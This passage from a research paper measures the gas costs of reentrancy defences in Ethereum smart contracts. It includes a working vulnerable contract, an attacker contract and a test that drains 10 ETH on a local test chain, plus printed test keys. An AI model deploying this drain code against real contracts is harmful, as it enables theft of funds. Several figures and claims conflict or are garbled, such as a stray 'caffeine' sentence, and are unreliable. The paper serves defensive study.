Sereum can be integrated into permissioned networks where changing the EVM is possible and agreed upon by the participants. It can also serve as a tool for analyzing and testing smart contracts in labs or on test networks.

2.3 Results of the Review and Statement of the Hypothesis

The literature review examined in detail various mechanisms for protecting Ethereum smart contracts from reentrancy attacks. Each method has unique features, advantages, and disadvantages, which makes them relevant for further research and testing.

The main interest of the study is precisely in the different nature of these protections (which was indicated at the beginning as a justification for choosing these methods, for example, a library versus a pattern, a pattern versus a logical change in transaction operations, and so on). It is important to emphasize that high-level approaches such as a library can include lower-level patterns, as is the case with the OpenZeppelin ReentrancyGuard library.

Briefly, the differences and features of the aimed mechanisms:

- CEI pattern: Assumes updating the contract state before external calls. This reduces the risk of attacks because an attacker cannot take advantage of stale state. However, it requires strict coding discipline and can be difficult to implement in complex functions.
- Use of mutexes: Using locks prevents re-entry into a function before it has completed execution. Effective against attacks, but can increase gas costs and prevent legitimate concurrent calls.
- Use of pull payments: Reduces risk by having users initiate withdrawals themselves, eliminating external calls from functions that

change state. However, this places additional burden on users and can lead to accumulation of funds in the contract.

- OpenZeppelin's ReentrancyGuard library: Offers a time-tested and easy-to-integrate solution. Easy to use, but increases contract size and introduces a dependency on an external library.
- Sereum's approach: An innovative method for dynamically monitoring attacks at the Ethereum virtual machine level. Allows to protect existing contracts without changing their code, but requires modification of the EVM and is difficult to implement in public blockchains.

Without studying the performance of each approach, the author can assume that if developers can trust a third-party library and there is no possibility of purchasing paid solutions, then *the easiest way is to use the ReentrancyGuard Library, since the use of patterns and mutexes imposes certain requirements on the professionalism of developers, but in turn, of course, provides greater control and flexibility.* This hypothesis discussed in the Discussion section

As for Sereum, as mentioned above, there is no way to directly embed it in a contract and measure performance, which, however, does not reduce the interest in such technology, for large projects that are sensitive to changes in the code, such an approach with Sereum (running a third-party security analyzer) can play a key role in the issue of choosing a protection mechanism.

So, these are the intermediate results of the analysis of these security systems. A more detailed discussion and comparison with other programming languages is presented in the "Discussion" section after measuring performance.

3. Methodology

3.1 Ethical Aspects of Reentrancy Attack Research

Before describing the methodology, it is necessary to clarify the ethical aspects of code that carries a threat of attack from an intruder, as well as the placement of an attacking contract in the public domain, which is potentially malicious software.

When studying security threats and attack methods, it is necessary to follow the fundamental ethical principles for the security testing:

- **Transparency and openness of goals:** The primary goal of security research should be to enhance overall safety, rather than to showcase exploit techniques (ISO/IEC 29147, 2014; CERT/CC, 2017). By describing vulnerabilities alongside their preventive measures, this research helps developers strengthen their defenses without inadvertently providing attackers with a blueprint (Ethereum Foundation, n.d.). The focus is on supporting the ecosystem rather than facilitating malicious activity.
- **Controlled Environments:** All simulated attacks must be conducted solely within isolated and secure test conditions, such as local blockchain emulators (e.g., Ganache) or designated Ethereum test networks (OpenZeppelin, n.d.). This approach ensures that no genuine users are harmed or placed at risk during the research process (ConsenSys Diligence, n.d.).

The research presented in the work, as well as recommendations for developers from the official documentation (Solidity Documentation, n.d.), serve only to improve the ecosystem and prevent future attacks. In this work all attacks were conducted with the safe test emulators.

3.2 Methodology for Smart Contract Testing

The purpose of this methodology is to demonstrate approaches to systematically study the performance and effectiveness of various mechanisms for protecting against reentrancy attacks in Ethereum smart contracts. Next, there was considered the main metrics, the stack of technologies for testing, as well as the implementation of tests in the form of code examples and examples of running on a test machine.

3.2.1 Key Metrics and Performance Evaluation Mechanism

The main metric for determining performance is gas consumption. Gas is a unit of measurement of computing resources required to perform operations on the Ethereum network. It determines the cost of transactions and smart contract execution, ensuring the security and efficiency of the blockchain (Ethereum.org, n.d.).

- Gas Unit: Each operation in the EVM requires a certain amount of gas. Simple actions, such as addition, require less gas than contract function calls (Ethereum Yellow Paper, 2014).
- Gas Price: Expressed in Gwei (1 Gwei = 10^{-9} ETH). Users set the price for gas, influencing the priority of the transaction for miners (Etherscan, n.d.).
- Gas Limit: The maximum amount of gas a user is willing to spend on a transaction, preventing excessive consumption of network resources (Ethereum Stack Exchange, 2024).

When sending a transaction, the gas limit and gas price are specified. Miners select transactions with a higher gas price. The total cost of a transaction is calculated as the product of the gas used and the gas price. If the gas is exhausted, the transaction is rolled back, but the gas used is paid for (Solidity Documentation, n.d.).

3.2.2 Development and Testing Tools

The development and testing stack of the upper level is described below and represents a standard set for developing testing in the Ethereum environment.

Some of the dependencies required directly for compiling contracts and running tests are specified in the package.json file:

```
#package.json
{
  "name": "tests-smart-contracts",
  "version": "1.0.0",
  "description": "Testing Smart Contracts with Truffle",
  "main": "truffle-config.js",
  "scripts": {
    "test": "truffle test"
  },
  "dependencies": {
    "truffle": "^5.5.14",
    "chai": "^4.3.4"
  },
  "devDependencies": {
    "@openzeppelin/contracts": "^4.8.0"
  },
  "author": "Aleksandr Pakhomovskii",
  "license": "MIT"
}
```

Listing 5: Test configuration

Development and testing stack with a brief description and version:

- Solidity: 0.8.0 and 0.6.0 (Only for demonstrating a successful attack)
- Truffle Framework v 5.5.14 (A framework for developing, testing, and deploying smart contracts. Provides migration management and integration with testing tools)
- Mocha v 8.4.0 Built into Truffle (A testing framework for organizing and executing test cases)
- Chai Assertion Library v 4.3.4 (An assertion library for writing clear and expressive test checks)
- Web3.js v 1.5.3 Built into Truffle (A library for interacting with the Ethereum blockchain, used to deploy contracts and send transactions)

- Ganache Uses Truffle's built-in local network (alternative: Ganache CLI version 7.7.0) (A local blockchain simulator for development and testing smart contracts)
- Node.js v 18.16.0 (LTS) (JavaScript runtime needed to run test scripts and manage dependencies)
- @openzeppelin/contracts v 4.8.0 (A standard smart contract library for increased security and functionality).

This list shows the versions at the time of testing, the author is not responsible for the correctness of the data reproduced by other versions.

3.3 Explanation of the Approach to Contract Protection, Attack, and Transfer of Funds

Before moving on to a detailed description of approaches to smart contract protection and transaction analysis, it is important to demonstrate using a practical example how a re-entrancy attack can be carried out. Understanding the mechanics of the attack accurately shows the effectiveness of the implemented protection mechanisms and test them in conditions as close as possible to real-life scenarios.

The next subsection shows an example of a successful attack on a vulnerable contract written in an outdated version of Solidity (0.6.0). The choice of this version is due to the fact that some dangerous sequences of calls and transfers of funds can still be used in older versions of the language. This, in turn, gives the opportunity to clearly illustrate the essence of the problem from which modern approaches to protection - such as the use of the CEI pattern, mutexes or the ReentrancyGuard library - should protect.

3.3.1 Demonstration of a Reentrancy Attack

As an example of a successful attack against which protection was be applied, a case has been developed using an outdated version of Solidity 0.6.0, where a dangerous sequence of funds transfer can be syntactically used

The vulnerable contract is presented in the block below:

```
// SPDX-License-Identifier: MIT
// Vulnerable contract with old implementation. Cannot be used in the new
Solidity version from 0.8.0 version. Implemented based on the
recommendations of the official Solidity documentation.

pragma solidity ^0.6.0;

contract Vulnerable {
    mapping(address => uint256) public balances;

    constructor() public payable {
        balances[msg.sender] = msg.value;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 _amount) external {
        require(balances[msg.sender] >= _amount, "Insufficient balance");

        // Vulnerable code: external call before state update
        (bool success, ) = msg.sender.call.value(_amount)("");
        require(success, "Transfer failed.");

        balances[msg.sender] -= _amount;
    }
}
```

Listing 6: Vulnerable contract

Problem: In the withdraw function, the external call `msg.sender.call.value(_amount)("")` occurs before the `balances[msg.sender] -= _amount;` state is updated. This allows an attacker to call the withdraw function again before the balance is updated. The attack can be implemented using the following malicious contract:

```
// SPDX-License-Identifier: MIT
// Attacker contract with old implementation
```

```

pragma solidity ^0.6.0;

contract Attacker {
    Vulnerable public vulnerableContract;
    uint256 public numCalls;
    uint256 public maxCalls = 10;

    constructor(address _vulnerableContractAddress) public {
        vulnerableContract = Vulnerable(_vulnerableContractAddress);
    }

    function fund() public payable {
        vulnerableContract.deposit.value(msg.value)();
    }

    function attack() public {
        numCalls = 0;
        vulnerableContract.withdraw(1 ether);
    }

    receive() external payable {
        if (numCalls < maxCalls) {
            numCalls++;
            // Calling the withdraw function again
            (bool success, ) = address(vulnerableContract).call(
                abi.encodeWithSignature("withdraw(uint256)", 1 ether)
            );
            if (!success) {
                // Retry call failed
            }
        }
    }
}

```

Listing 7: Attacker contract

An example of an attack implemented in the test:

```

// SPDX-License-Identifier: MIT

const Attacker = artifacts.require("Attacker");

contract("Reentrancy Attack", (accounts) => {
    it("should demonstrate successful reentrancy attack", async () => {
        // Initial balance of the attacker
        let initialBalance = await web3.eth.getBalance(accounts[0]);
        console.log(
            "Initial balance of accounts[0]:",
            web3.utils.fromWei(initialBalance, "ether"),

```

```

    "ETH"
  );

  // Deploying a vulnerable contract (without protection mechanism)
  const vulnerableContract = await artifacts.require("Vulnerable").new({
    from: accounts[0],
    value: web3.utils.toWei("10", "ether"), // The contract initially
contains 10 ETH
    gas: 5000000,
    gasPrice: 2000000000,
  });

  // Deploying an attacking contract
  const attacker = await Attacker.new(vulnerableContract.address, {
    from: accounts[0],
    gas: 5000000,
    gasPrice: 2000000000,
  });

  // Attack contract replenishment 1 ETH
  await attacker.fund({
    from: accounts[0],
    value: web3.utils.toWei("1", "ether"),
    gas: 100000,
    gasPrice: 2000000000,
  });

  // Attacking contract balance before attack
  let attackerBalanceBefore = await web3.eth.getBalance(attacker.address);
  console.log(
    "Attacker contract balance before attack:",
    web3.utils.fromWei(attackerBalanceBefore, "ether"),
    "ETH"
  );

  // Performing an attack
  await attacker.attack({
    from: accounts[0],
    gas: 5000000,
    gasPrice: 2000000000,
  });

  // Attacking contract balance after attack
  let attackerBalanceAfter = await web3.eth.getBalance(attacker.address);
  console.log(
    "Attacker contract balance after attack:",
    web3.utils.fromWei(attackerBalanceAfter, "ether"),
    "ETH"
  );

```

```

// Balance of a vulnerable contract after an attack
const vulnerableContractBalance = await web3.eth.getBalance(
  vulnerableContract.address
);
console.log(
  "Vulnerable contract balance after attack:",
  web3.utils.fromWei(vulnerableContractBalance, "ether"),
  "ETH"
);

// The attacker has successfully withdrawn funds
assert(
  web3.utils.toBN(attackerBalanceAfter).gt(
    web3.utils.toBN(attackerBalanceBefore)
  ),
  "Attacker was not able to drain funds!"
);

// The balance of the vulnerable contract has decreased
assert(
  web3.utils
    .toBN(vulnerableContractBalance)
    .lt(web3.utils.toBN(web3.utils.toWei("10", "ether"))),
  "Vulnerable contract balance should have been drained"
);
});
});
});

```

Listing 8: Attacker contract

Result of script execution:

```

> truffle test
Using network 'development'.
Compiling your contracts...
=====
> Everything is up to date, there is nothing to compile.
  Contract: Reentrancy Attack
Initial balance of accounts[0]: 1688.975674092 ETH
Attacker contract balance before attack: 0 ETH
Attacker contract balance after attack: 11 ETH
Vulnerable contract balance after attack: 0 ETH
  ✓ should demonstrate successful reentrancy attack (207ms)
1 passing (252ms)

```

Listing 9: Console output

With new versions of Solidity (0.8.0), mechanisms have been introduced to help developers prevent reentrancy attacks:

- Overflow checks: By default, arithmetic operations check for overflow and throw an exception if one is detected.
- Syntax changes: Use of new syntax for passing values and data in function calls.

This allows to avoid damage due to language flaws, in general, but of course does not exclude the possibility of an attack due to a change in the logic of new malicious algorithms based on the idea of re-entry.

3.3.2 Implementation of Performance Testing of Secure Smart Contracts

In total, several phases are presented, with a detailed description of the step and the output of the results.

Phase 1: Deploying Protected Contracts

These contracts are located in the contracts directory by default, when compiling, all contracts are initialized but without deployment, which only happens during testing when the Ethereum network is running.

The tested contracts again:

- VulnerableContract (A vulnerable contract without protection mechanisms, susceptible to reentrancy attacks)
- CEI ProtectedContract: Implements the Checks-Effects-Interactions (CEI) pattern to prevent reentrancy.
- CEI ProtectedContract in the advanced implementation.
- MutexProtectedContract: Uses a mutex (lock) to prevent repeated function calls until the previous one completes.
- PullPaymentContract: Uses a pull payment model in which users initiate their own withdrawals.
- OZReentrancyGuardedContract: Uses ReentrancyGuard from the OpenZeppelin library to protect against reentrancy.

Each contract is designed to simulate real-world scenarios where users may deposit and withdraw Ether, which could potentially be vulnerable to reentrancy attacks if not properly protected.

Phase 2: Initialization

Contract funding - to ensure that test accounts on the Ganache local network have enough Ether to perform transactions.

An example of launching test accounts with limits and gas prices set:

```
> ganache-cli --gasLimit 10000000 --defaultBalanceEther 2000 --gasPrice
2000000000
ganache v7.9.2 (@ganache/cli: 0.10.2, @ganache/core: 0.10.2)
Starting RPC server

Available Accounts
=====
(0) 0x95f2dbcA7dc04069Ca8daD18dac41D39d02133a8 (2000 ETH)
(1) 0xa652bEE9dF344b8fD48529e9A533c01A0C64D0A1 (2000 ETH)
(2) 0x69f70226bf98B2379a18E818A26dbFD7Ab042f54 (2000 ETH)
(3) 0xf602D6d761ba141c6764e0e8d8F0CDac23e15ffc (2000 ETH)

Private Keys
=====
(0) 0x6bb96a21c3c4c182eb1ca2ca6bae6b3f4ae0363ed400c17588056a19beef672e
(1) 0x59999f852101f0ea30b0154da8a33334197590f3d28f3ef2db8b67f806554990
(2) 0xdbdb33ca44fed907d00e06871e8d35f80ee1436c59d6d5554367088418bd3597
(3) 0x8c0bbe805787c4a24ef8cc915e709c2ef6a4d9bf78a6149ddb255aacf12e55ae

HD Wallet
=====
Mnemonic:      energy only video ranch engage capital humor marble combine
sibling decrease nephew
Base HD Path:  m/44'/60'/0'/0/{account_index}

Default Gas Price
=====
2000000000

BlockGas Limit
=====
10000000

Call Gas Limit
```

```
=====
50000000

Chain
=====
Hardfork: shanghai
Id:      1337

RPC Listening on 127.0.0.1:8545
```

Listing 10: Console output

The console output, Ganache, automatically distributes Ether between accounts, simulating an environment close to the real Ethereum network.

Phase 3: Contract Initialization

Deploying contracts with initial balance: Each contract is deployed with a balance of 10.5 ETH to simulate real-world conditions.

```
// SPDX-License-Identifier: MIT

const [deployer, user] = await ethers.getSigners();
const vulnerable = await VulnerableContract.deploy({ value:
ethers.utils.parseEther("10.5") });
// The same applies to other contracts.
```

Listing 11: VulnerableContract.sol

Phase 4: Performing tests

Deposit:

- Action: The user deposits 1 ETH into each contract.
- Goal: Test basic deposit functionality and prepare for withdrawals.

```
// SPDX-License-Identifier: MIT

await vulnerable.connect(user).deposit({ value:
ethers.utils.parseEther("1.0") });
// The same for other contracts.
```

Listing 12: Deposit function

Withdraw funds:

- For contracts with the `_amount` parameter: User withdraws 0.5 ETH.

- For PullPaymentContract: User withdraws all available funds.
- Goal: Test the withdrawal functionality and measure gas consumption.

```
// SPDX-License-Identifier: MIT

await vulnerable.connect(user).withdraw(ethers.utils.parseEther("0.5"));
await pullPayment.connect(user).withdraw();
// The same applies to other contracts.
```

Listing 13: Withdraw function

Recording balances:

- After deposit and withdrawal: Contract and user balances are recorded.
- Goal: To ensure correct management of funds and to identify possible anomalies.

```
// SPDX-License-Identifier: MIT

const balanceVulnerable = await vulnerable.balances(user.address);
// The same applies to other contracts.
```

Listing 14: Recording balances

By invoking withdraw (Listing 13) and recording balances (Listing 14), was verified correct fund management, validate contract behavior, and compare gas efficiency across vulnerable, PullPayment, and other contract variations.

3.3.3 Measuring Gas Consumption

Gas measurement was performed using hardhat-gas-reporter for automatic registration of gas consumption.

The main goal to evaluate exactly gas compensation but additionally was evaluated and time of execution.

Several runs were performed sequentially to show stability. The discrepancy is insignificant, which shows the stability of both the test environment and the contracts themselves). The whole output of execution presented below.

```
> truffle test
Using network 'development'.

Compiling your contracts...
=====
> Everything is up to date, there is nothing to compile.

Contract: Smart Contract Tests

=== Vulnerable ===
Average gas used for deployment: 364215
Average gas used for deposit: 43615
Average gas used for withdrawal: 34271
Final contract balance: 10.5 ETH
Final user balance in contract: 0.5 ETH
  ✓ test Vulnerable contract (369ms)

=== SecureCEI ===
Average gas used for deployment: 364215
Average gas used for deposit: 43615
Average gas used for withdrawal: 34271
Final contract balance: 10.5 ETH
Final user balance in contract: 0.5 ETH
  ✓ test SecureCEI contract (325ms)

=== AdvancedCEI ===
Average gas used for deployment: 644408
Average gas used for deposit: 45232
Average gas used for withdrawal: 60479
Final contract balance: 10.5 ETH
Final user balance in contract: 0.5 ETH
  ✓ test AdvancedCEI contract (399ms)

=== SecureMutex ===
Average gas used for deployment: 413160
Average gas used for deposit: 43615
Average gas used for withdrawal: 45489
Final contract balance: 10.5 ETH
Final user balance in contract: 0.5 ETH
  ✓ test SecureMutex contract (371ms)

=== SecurePullPayment ===
Average gas used for deployment: 328162
Average gas used for deposit: 43615
Average gas used for withdrawal: 28718
Final contract balance: 10 ETH
Final user balance in contract: 0 ETH
  ✓ test SecurePullPayment contract (302ms)

=== SecureOZReentrancyGuard ===
```

```
Average gas used for deployment: 430332
Average gas used for deposit: 43615
Average gas used for withdrawal: 36673
Final contract balance: 10.5 ETH
Final user balance in contract: 0.5 ETH
  ✓ test SecureOZReentrancyGuard contract (278ms)

6 passing (2s)
```

Listing 15: Logs from the console

In the next chapter all results are presented in the tables and graphics. The full example of a test script file (with the possibility to reproduce) is available in the author's [public repository on GitHub](#) (Pakhomovskii, 2024).

4. Results

This section only provides demonstration of results in the form of tables and graphs for visual presentation. All tests were performed on the author's local computer, with the test environments and test wallets already deployed. Such an approach prevents the appearance of incorrect results or impact on existing metrics. In any case, it is desirable that no other processes related to smart contracts occur inside the test network. For independent reproduction, it is necessary to install all dependencies that are specified in the author's repository.

The following table (Table 2) shows measurements of gas consumption for each contract during typical operations: deployment, deposit, and withdrawal. These results provide a clear comparison of efficiency and resource usage that can help to understand the trade-offs introduced by different protection mechanisms. Also

Contract	Gas During Deployment	Gas During Deposit	Gas During Withdrawal	Transaction Execution time (all types), ms
Vulnerable	364 215	43 615	34 271	369
CEIProtected	364 203	43 615	34 271	325
AdvancedCEI	644 408	45 232	60 479	399
MutexProtected	413 160	43 615	45 489	371
PullPayment	328 162	43 615	28 718	302
OZReentrancyGuarded	430 332	43 615	36 673	278

Table 2: The results of the measurements gas consumption

Diagram 1 highlights the gas costs during contract deployment, showing how complexity and added security mechanisms impact the initial setup.

Diagram 1: Comparison of gas costs during deployment

Diagram 2 compares gas usage for the withdrawal function, where variations reflect differences in reentrancy protection and user interaction models.

Diagram 2: Comparison of gas costs when executing the withdraw function

Diagram 3 focuses on gas consumption for the deposit function, which is consistent across most implementations but still provides insight into overhead from additional logic.

Diagram 3: Comparison of gas costs when executing the deposit function

Transaction execution time (in milliseconds) for deploy, deposit and withdraw operations for each contract below on the Diagram 4 where can be seen that for all functions execution time is evaluated.

Diagram 4: Execution time (ms)

The following diagrams below present the correlation between transaction execution time and gas consumption:

Diagrams 5-7: Correlation between Gas Consumption and Transaction Times (Deposit, Withdrawal and Deploy)

The graphs show that gas consumption varies significantly depending on the type of contract and operation, with AdvancedCEI constantly requiring the most gas. Transaction execution times, however, remain relatively consistent across all contracts, indicating that gas consumption has little direct impact on execution speed under standard conditions.

This confirms that such a metric (transaction execution time) does not act as a key one in scientific papers. If the operations have similar computational complexity, their execution time will be the same. To determine a more accurate correlation between gas costs and function execution time, higher traffic volumes are needed. But given that the main overhead is the fee for gas consumption, the function execution time is omitted and further conclusions contain information only about gas consumption.

Key highlights from analyzing gas costs based on the contract with a given security and the transaction/deployment type:

Deployment Gas:

- PullPaymentContract has the lowest gas consumption (328,162), likely due to its simpler logic and lack of additional state variables.
- AdvancedCEI has the highest gas consumption (644,408), which can be attributed to its more complex logic and additional safety mechanisms.

After all transactions, each contract maintains a balance of 11 ETH, reflecting the initial balance of 10.5 ETH plus 1 ETH deposit minus any withdrawals. For PullPaymentContract, the user balance is 0 ETH as the user withdraws all available funds during the test. All other contracts maintain a user balance of 0.5 ETH, indicating partial withdrawal functionality.

Percentage Change in Gas Cost (Deployment):

- MutexProtectedContract: ~13% increase compared to VulnerableContract.

- PullPaymentContract: ~10% decrease compared to VulnerableContract.
- OZReentrancyGuardedContract: ~18.2% increase compared to VulnerableContract.
- AdvancedCEI: ~76.9% increase compared to VulnerableContract.

Percentage Change in Gas Cost ():

- MutexProtectedContract: ~33% increase in cost compared to VulnerableContract.
- PullPaymentContract: ~16.2% decrease in cost compared to VulnerableContract.
- AdvancedCEI: ~76.5% increase compared to VulnerableContract.

The next chapter provides detailed reasoning based on the data obtained, as well as recommendations according to which programmers or analysts can make forecasts for the expected gas consumption for their contracts.

5. Discussion

5.1 Gas Consumption Analysis for a Contract with Different Protection

In Section 2.3, there was advanced the hypothesis that if commercial solutions are not available or if external libraries are sufficiently robust, the easiest way to implement them would be to integrate with the ReentrancyGuard tool. Now, based on the results of the gas consumption and practical applicability analysis presented in this section, the author can either support this assumption or modify it. In addition, conclusions with the data from the literature (e.g., Torres et al., 2019 recommendations and Sereum discussion) allow to determine that author's comparison results are consistent or at odds with the already known points of view in the community.

It is important to note that the difference in gas consumption can only be detected under production loads, and depending on the maximum network load and transaction volumes, it is possible to make economic gains from one approach or another, but given the research nature of the work, measurements at low capacities can be interpreted as reliable, and the projection onto the production service can be planned based on these results.

Several key patterns have been identified:

- 1) Tradeoff between security and gas costs: Protection mechanisms, including mutexes, ReentrancyGuard, and AdvancedCEI, increase gas consumption, especially during deployment and withdrawal functions.
 - AdvancedCEI, while more gas-intensive than basic CEI, provides more safety and flexibility. Based on the author's opinion it is suitable for contracts that are more complex or have higher risks.
 - Pull payments reduce gas costs. Effective in reducing gas consumption, but requires changes to the user experience.
- 2) Practicality:
 - CEI remains the most cost-efficient solution for basic security needs.

- AdvancedCEI offers an improved security framework with increases in gas costs, it can be considered as a good choice for contracts that need more safety without the full overhead of mutexes.
- Pull payments and mutexes are more specialized solutions for specific contract needs.

Below, was considered each approach separately and how a developer can evaluate the practicality of using one or another method.

Checks-Effects-Interactions (CEI) pattern:

- Provides basic protection against reentrancy attacks.
- Does not increase gas costs when deploying and executing functions.
- Recommended for use as a standard practice in smart contract development.

AdvancedCEI (AdvancedCEIContract):

- Enhances the traditional CEI pattern by additional safety checks and advanced state management.
- Protects against a wider range of vulnerabilities compared to standard CEI.
- Balances security and gas costs better than mutexes or ReentrancyGuard in many cases.

Mutex (MutexProtectedContract):

- Prevents repeated function calls before they complete their execution, providing a high degree of protection.
- Increases gas costs on deploy (~13%) and especially on withdraw (~33%)
- Suitable for contracts where security is paramount and the extra gas cost is justified.

OpenZeppelin ReentrancyGuard:

- Provides time-tested and community-backed reentrancy protection with optimized code.

- Lower gas cost on functions compared to manual mutex implementation.
- Increases gas costs on deploy (~18.8%).
- Recommended for high-risk contracts with significant amounts of funds.

Pull Payments (PullPaymentContract):

- Reduces gas costs on deploy (~10%) and withdraw (~16%).
- Strong the risk of reentrancy attacks, since funds are withdrawn at the user's initiative.
- Requires changes to the user interaction logic, which may be unusual or inconvenient.
- Suitable for applications where changing the user experience is acceptable and reducing gas costs is important.

Developers should evaluate how critical security is in the context of their application and how additional gas costs will affect users.

The choice of a security mechanism should be based on the specific requirements and related to risks with a particular smart contract.

5.2 General Recommendations

In the block diagrams (Figure 6), the distribution of recommendations is presented depending on the applied pattern. This illustration shows how patterns or user experience usage can be related, and also highlights how auditing and libraries stand alone and may not be related to anything.

Figure 6: Dependence of patterns on goals

Serium technology can be attributed to an independent block Audits, which, as can be seen, is located independently of the goals and user experience, but which requires independent analysis, which is not carried out in this work.

Below are general recommendations that can generally be correlated with the initial recommendations obtained after reviewing the literature, only now the hypotheses regarding high intake of caffeine with high protection are confirmed.

- 1) Always use the CEI pattern
 - Reason: Provides basic protection at no additional cost, improving contract security.
 - Action: Structure smart contract functionality according to the Verification-Effect-Interaction principles.
- 2) Choose a security mechanism based on risk assessment
 - Low-risk contracts: The CEI pattern may be sufficient to ensure security.

- High-risk or high-value contracts:
- Additional mechanisms such as mutexes or ReentrancyGuard are recommended.

3) Consider user experience

- Pull payments: Use if the change in interaction logic does not negatively affect the user and is acceptable in the context of the application.
- Communicate with users: Explain changes in the interface and interaction to avoid misunderstandings.

AdvancedCEI for contracts requiring improved safety without incurring the full cost of mutexes or ReentrancyGuard. It is a balance between added security and moderate gas consumption, making it ideal for medium-risk applications.

The author also recommends using static code analyzers that were not considered in this work, but which are of course also important and do not consume gas at all. Also, a basic recommendation may be to conduct an audit or implement protection with constant support that is offered by paid protection options presented in Figure 2 of the introduction section.

5.3 Comparison of Approaches to Protecting Smart Contracts in Other Programming Languages

The results show that while mutex-based approaches provide very high reliability, they also come with higher gas costs. More modern languages such as Rust place a strong emphasis on optimal function execution and also lack of a garbage collector, making it an excellent choice for using mutexes. Below, we show how Rust includes built-in support for mutex unlock functions and operations.

```
// SPDX-License-Identifier: MIT
// The following code snippet is borrowed from the official Rust
documentation ("The Rust Programming Language" book)

use std::sync::{Arc, Mutex};
```

```

use std::thread;

fn main() {
    // Create a shared resource wrapped in Arc and Mutex
    let data = Arc::new(Mutex::new(0));
    let mut handles = vec![];
    // Spawn multiple threads
    for _ in 0..10 {
        let data = Arc::clone(&data); // Clone the Arc for thread safety
        let handle = thread::spawn(move || {
            let mut num = data.lock().unwrap(); // Lock the mutex
            *num += 1; // Modify the resource
        });
        handles.push(handle);
    }
    // Wait for all threads to finish
    for handle in handles {
        handle.join().unwrap();
    }
    println!("Final value: {}", *data.lock().unwrap());
}

```

Listing 16: Mutex implementation in Rust (borrowed from *The Rust Programming Language* official documentation)

As was said, in the SecureMutex contract, the noReentrant modifier acts as a mutex, blocking repeated calls to the withdraw function until the current execution is completed. Arc and Mutex also provide safe access to shared data between threads, automatically managing locks without manual intervention. Unlike Solidity, where the developer explicitly manages the state of the lock, Rust provides built-in synchronization mechanisms, which reduces the likelihood of errors and increases reliability. In addition, a strict type system and compile-time checks in Rust help reduce gas costs, making it a good alternative for developing efficient, secure smart contracts and in general for the future research.

6. Conclusion

As the protection methods under consideration, technologies were selected that represent different levels of abstraction, which made the review as diverse as possible. Universality of library use, simplicity of an independent pattern, reliability of mutexes. With such approaches, developers most often approach the issue of choosing a technology. And the choice of approaches to testing is, in the author's opinion, the most objective if such abstractions are taken into account.

Also, the hypothesis was confirmed: using the ReentrancyGuard library turned out to be the most effective and simple solution in conditions of limited resources and the need to trust third-party libraries, and it also can give the trusted security and functionality without additional costs. But the author also made a number of his own conclusions that could be of interest to developers:

- The CEI pattern, although simple to implement and does not increase gas costs, requires discipline from the developer and can be difficult in some cases.
- AdvancedCEI Pattern: Ideal for medium-to-high-risk contracts requiring enhanced safety without full reliance on mutexes or external libraries. Balances additional security with higher gas costs, making it a good compromise for moderately complex applications.
- Mutexes: Effectively prevent reentry, but increase gas costs and can block legitimate calls. And can also potentially be replaced by other technologies such as Rust
- Pull payments Reduce gas costs and minimize the risk of reentry, but require changes to the user experience and can cause delays in payments.
- ReentrancyGuard: A proven solution, easy to integrate, but increases the size of the contract and depends on an external library.
- Sereum: Benefits include the ability to protect already deployed contracts, detection of complex and new types of attacks, and a low false positive rate thanks to dynamic analysis. However, implementing Sereum requires modifications to the EVM

Tests have shown that protection mechanisms such as mutexes and ReentrancyGuard lead to increased gas costs, which can be critical for applications with a high transaction frequency. At the same time, the CEI pattern does not increase costs, and pull payments allow reducing overall costs, but require changes in the logic of user interaction.

The AdvancedCEI Pattern introduces a robust enhancement to traditional CEI without requiring external libraries or complete overhauls to contract logic. It offers a secure and gas-conscious middle ground that would be great for standard developer's toolkit. For high-value or complex contracts, AdvancedCEI is a good choice to balance security, usability, and cost.

One of the interesting areas considered in this paper is the possibility of using the Rust programming language for developing smart contracts. Unlike Solidity, Rust offers built-in synchronization and memory management mechanisms, which significantly reduces the likelihood of errors and increases the reliability of contracts.

An example in Rust using *Arc* and *Mutex* demonstrates safe access to shared data between threads without the need for manual lock management. This contrasts with Solidity, where the developer is required to explicitly manage the state of the lock using modifiers, which increases the risk of introducing vulnerabilities. A strict type system and compile-time checks in Rust further contribute to reducing gas costs and increasing the efficiency of smart contract execution.

Although Rust is not yet the main language for developing smart contracts on popular platforms such as Ethereum, its advantages make it a promising candidate for the future development of blockchain ecosystems. Due to its native support for mutexes as part of the mandatory syntax and the absence of a garbage collector as mentioned in the "Introduction" Figure 3 (CoinGecko, 2022). Several blockchain platforms, such as Solana, Polkadot, and NEAR, have integrated Rust into their ecosystems, which opens obvious opportunities such as reduced audit costs and Increased user trust.

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